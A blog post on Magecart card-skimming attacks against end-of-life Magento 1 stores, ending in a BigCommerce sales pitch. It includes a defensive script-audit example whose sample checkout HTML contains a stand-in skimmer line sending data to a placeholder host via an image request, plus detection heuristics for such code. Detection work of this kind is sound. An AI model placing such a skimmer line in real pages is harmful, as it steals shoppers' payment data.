Magento 1 eCommerce Sites Security Vulnerabilities


Back in June of this year, Magento 1 reached its End of Life (EOL), which left a lot of businesses scrambling to figure out their best options while exposed to the security vulnerabilities that the Magento 1 EOL opened up.
Whenever security risks are mentioned, it’s something to take seriously.


Thousands of online stores running Magento software have been successfully attacked since summer 2020. Here are some of the news headlines and updates from technology and cybersecurity research companies and publishers:

Update Sept 18: Cardbleed has infected 2806 Magento1 stores so far (3% of total install base).

Over the weekend, almost two thousand Magento 1 stores across the world have been hacked in the largest documented campaign to date. It was a typical Magecart attack: injected malicious code would intercept the payment information of unsuspected store customers. Inspected stores were found running Magento version 1, which was announced End-Of-Life last June. (1)

Over 2800 e-Shops Running Outdated Magento Software Hit by Credit Card Hackers(2)

Magecart Group 12: End of Life Magento Sites Infested with Ants and Cockroaches(3)

What is Magecart?

Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it is a sophisticated implant built on top of relays, Command and Control services, and anonymizers. The first stage is typically implemented in JavaScript included in a compromised checkout page. It copies data from “input fields” and sends it to a relay, which collects credit cards coming from a subset of compromised eCommerce sites and forwards them to Command and Control servers.

Magecart is not an official group, but rather a label for a set of tactics. The cybercriminals look for ways to exploit eCommerce software to steal credit card numbers and other personal customer information. This is usually done by capturing customer data as it’s entered into web forms for payment.
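Because the first stage lives in the checkout page's own scripts, a merchant can audit which scripts that page loads. The following is an added example, not code from this article or from any vendor it cites: it flags script hosts outside an allowlist and inline scripts that both read form fields and send data out. The hostnames, the allowlist, the heuristics and the sample HTML are all constructed assumptions.

```javascript
// Added example: defensive audit of <script> tags on a checkout page.
// Hostnames and the sample HTML are constructed for illustration.
const ALLOWED_HOSTS = new Set(["shop.example", "js.payments.example"]);

// Inline-code heuristics: reads form fields AND has a way to send data out.
const READS_INPUTS = /querySelectorAll\(\s*["'][^"']*(input|select|textarea)|getElementsByTagName\(\s*["']input|\.elements\b/i;
const SENDS_DATA = /\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\b|\.src\s*=/i;

function auditCheckoutScripts(html, pageOrigin, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    if (src) {
      // External script: resolve relative and protocol-relative URLs first.
      const raw = src[1] ?? src[2] ?? src[3];
      let host = null;
      try { host = new URL(raw, pageOrigin).hostname; } catch { /* unparsable URL */ }
      if (host === null || !allowedHosts.has(host)) {
        findings.push({ type: "script-host-not-allowlisted", detail: raw });
      }
    } else if (READS_INPUTS.test(body) && SENDS_DATA.test(body)) {
      findings.push({ type: "inline-reads-inputs-and-sends", detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed checkout page: two expected scripts, one benign inline script,
// one unexpected third-party script, one inline script matching both heuristics.
const SAMPLE_HTML = `
<form id="payment"><input name="cc_number"><input name="cc_cvv"></form>
<script src="/js/checkout.js"></script>
<script src="https://js.payments.example/v1/sdk.js"></script>
<script>document.querySelectorAll("input").forEach(i => { i.required = true; });</script>
<script src="//cdn.unknown-host.invalid/lib.js"></script>
<script>var f = document.querySelectorAll("input"); /* ... */ new Image().src = "https://relay.invalid/p?d=" + d;</script>
`;

console.log(auditCheckoutScripts(SAMPLE_HTML, "https://shop.example"));
```

The same allowlist can be enforced in the browser with a Content-Security-Policy header whose `script-src` and `connect-src` directives name only the expected hosts.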

Unfortunately for those on the Magento platform, according to an October 2020 report by independent cybersecurity company Foregenix (5), 55% of Magento 2 sites are at a high or critical security risk level.

Some common security risks seen on Magento include server attacks, credit card hijacking, website defacement, and botnetting. All of these risks are only compounded now that Magento 1 is no longer supported. The reason? Magento is no longer creating updates or issuing security patches for the product.

Although you might be thinking that switching to Magento 2 (if you haven’t already) seems like the easy fix, it might not be. This option is still a complete replatform which means your themes won’t transfer, your M1 extensions won’t work, and some of your data will have to be migrated manually. M1 and M2 have a different architecture which is why this isn’t a simple upgrade.

Another option is to switch platforms altogether and BigCommerce might be the answer. I know you’re probably thinking you might as well stay with the platform you’re used to, but it might not be the case and you could lose out on a better option during a critical time.

Magento is an open-source platform that has increasingly shifted to appear more like a Software as a Service (SaaS) platform, introducing a cloud offering to give merchants the feel of having a single vendor. BigCommerce is already uniquely positioned as an open SaaS platform for easy use. This allows merchants to achieve customization and integrations that had historically only been possible using an on-premise open-source platform.

BigCommerce

  • With BigCommerce, there are no installation or integration fees and no downtime with each upgrade.
  • When BigCommerce rolls out an update that enables a new feature, merchants will have access to it immediately and can control when or if they want to enable that new feature.
  • Over 90% of the BigCommerce platform is exposed via APIs. This, along with pre-built integrations and an open checkout, allows you to adapt the platform to your exact needs.

Magento

  • Keeping up with the security patches AND version updates necessary to have the latest secure version of Magento is time-consuming and labor-intensive.
  • The more customization a merchant makes, the harder their Magento store becomes to maintain.
  • Access to the source code means you have the ability to customize extensively; however, you may be limited by the cost and the complexity introduced.

Make the switch today and get rid of the security headaches with the best ecommerce platform out there. Start your free 15-day trial.

References

  1. “Cardbleed: a massive Magento1 hack – Sansec.” 14 Sep. 2020, https://sansec.io/research/cardbleed.
  2. “Over 2800 e-Shops Running Outdated Magento Software Hit ….”, https://thehackernews.com/2020/11/over-2800-e-shops-running-outdated.html.
  3. “Magecart Group 12: End of Life Magento Sites Infested with ….”, https://www.riskiq.com/resources/research/magecart-ant-and-cockroach-skimmer/.
  4. “magecart (Malware Family) – Malpedia”, https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart.
  5. “Magento Website Security Report”, https://f.hubspotusercontent00.net/hubfs/464751/Assets/Report/Foregenix-Magento_Security_Report-20201005.pdf

January 2, 2021 by Igor Nesmyanovich, Ph.D., CISSP
